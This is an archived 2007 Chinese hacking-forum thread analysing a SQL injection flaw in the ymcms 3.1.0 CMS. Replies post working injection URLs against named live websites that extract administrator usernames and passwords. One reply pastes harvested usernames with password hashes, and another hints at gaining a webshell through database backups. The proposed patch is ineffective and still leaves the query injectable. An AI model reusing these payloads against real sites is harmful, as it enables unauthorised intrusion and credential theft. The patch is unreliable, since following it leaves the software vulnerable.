邪恶八进制信息安全团队技术讨论组 » 论坛原创{ Original Paper } » [原创]ymcms3.1.0漏洞分析 [查看完整版本]

独孤依人 2007-7-31 13:32

[原创]ymcms3.1.0漏洞分析

文章作者：[email]Flyh4t@126.com[/email]
信息来源：邪恶八进制信息安全团队（[url]www.eviloctal.com[/url]）

[b]注意：文章首发[url=http://Www.Cnsst.Org]脚本安全小组内部论坛[/url]（[url]Www.Cnsst.Org[/url]），后由原创作者友情提交到邪恶八进制信息安全团队技术论坛，转载请注明首发站点。[/b]

夜猫cms是一个很著名的商业cms，现在公开发放的免费版本最高是3.1.0(有哪位兄弟能提供
最新的3.2.0商业版，偶感激不尽)。看漏洞：

forum_zoom.php
31~48行
if ($forumid != ""){
    $isforum = " && forumid IN (".$forumid.") ";
  }else{
    $isforum = "";
  }
//forumid明显没有过滤
  ……
  $sql = "SELECT threadid, title, lastpost FROM ".$ym_thread_tab." WHERE isshow='1' ".$isforum." ORDER BY ".$isaction." LIMIT 0, ".$shownum;
发生了注射
利用方法：
[url]http://www.longchenhua.com/forum_zoom.php?forumid=15[/url])%20and%201=1/*
正常

[url]http://www.longchenhua.com/forum_zoom.php?forumid=15[/url])%20and%201=2/*
空白

[url]http://www.longchenhua.com/forum_zoom.php?forumid=15[/url])%20and%201=2%20union%20select%201/*
暴错
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/ftp/512j.com/l/o/n/longchenhua/forum_zoom.php on line 50

大家看到了吧，可以自己去构造注射语句来利用了，偶就不再测试了
另外，这个系统还有远程包含的问题，大家要是有兴趣自己看哦
再次呼唤3.2.0商业版代码，可以发我邮箱，hoho

注：小组论坛因某些原因关闭了，小组一些原创的东西就发邪八给大家共享，Fly没权限，我代发了。

独孤依人 2007-7-31 13:52

[url]http://www.longchenhua.com/forum_zoom.php?forumid=15[/url])%20and%201=2%20union%20select%201,concat(username,0x3f,password),3%20from%20user%20where%20userid=1/*

flyh4t 2007-7-31 13:58

用的人很少了 :(
后台备份数据库为 xxx.php.xxx.sql可以得到个shell

pixy 2007-7-31 14:41

测试了几个..不行,md5查不出来，我想是改了代码的...

这个原创是3.10免费版的，网上很多都是商业版,包括黑白,所以有点问题..

测试的都不行:
[url]http://www.zslxx.cn/forum_zoom.php?forumid=15[/url])%20and%201=2%20union%20select%201,concat(username,0x3f,password),3%20from%20user%20where%20userid=1/*

[url]http://www.yemao.com/forum_zoom.php?forumid=15[/url])%20and%201=2%20union%20select%201,concat(username,0x3f,password),3%20from%20user%20where%20userid=1/*

独孤依人 2007-7-31 14:43

已经说明商业版不存此漏洞，因为没找到商业版代码，如果哪位朋友有，还希望提供下，谢谢

flyh4t 2007-7-31 15:04

黑白的
[url]http://www.heibai.net/article/forum_zoom.php?forumid=15[/url])%20and%201=2%20union%20select%201,concat(username,0x3f,password),3%20from%20user%20where%20usergroupid=1/*

document.write("· starkun?f0295802427cb4e72233d6d2b97e62e1 [01/01]
"); document.write("· 波波?0b932b937c8296af16c3c8690d09f8eb [01/01]
"); document.write("· wangzhanbianji?cbcc1296bc0f14a9ffac5fec7e24bbe3 [01/01]
");

flyh4t 2007-7-31 15:04

商业版 3.1.0 也是有漏洞的
3.2.0的没代码看 :(

scw121 2007-8-1 09:26

``flyh4t 兄需要3.2.0的短消息PM我``

wwwst 2007-8-1 11:05

修补:

forum_zoom.php
31~48行
if ($forumid != ""){

    if(is_int($forumid))
{
  $forumid=intval($forumid);
}else {
  ///////容错处理****////
}
    $isforum = " && forumid IN (".$forumid.") ";
  }else{
    $isforum = "";
  }

flyh4t 2007-8-1 11:28

不晓得密码是怎么加密的,貌似被zend掉了部分文件
不是单纯的md5

wwwst 2007-8-1 15:01

[quote]引用第9楼flyh4t于2007-08-01 11:28发表的 :
不晓得密码是怎么加密的,貌似被zend掉了部分文件
不是单纯的md5[/quote]
MD5

asdffff 2007-8-3 19:45

不会用哦

查看完整版本: [原创]ymcms3.1.0漏洞分析

© 1999-2008 EvilOctal Security Team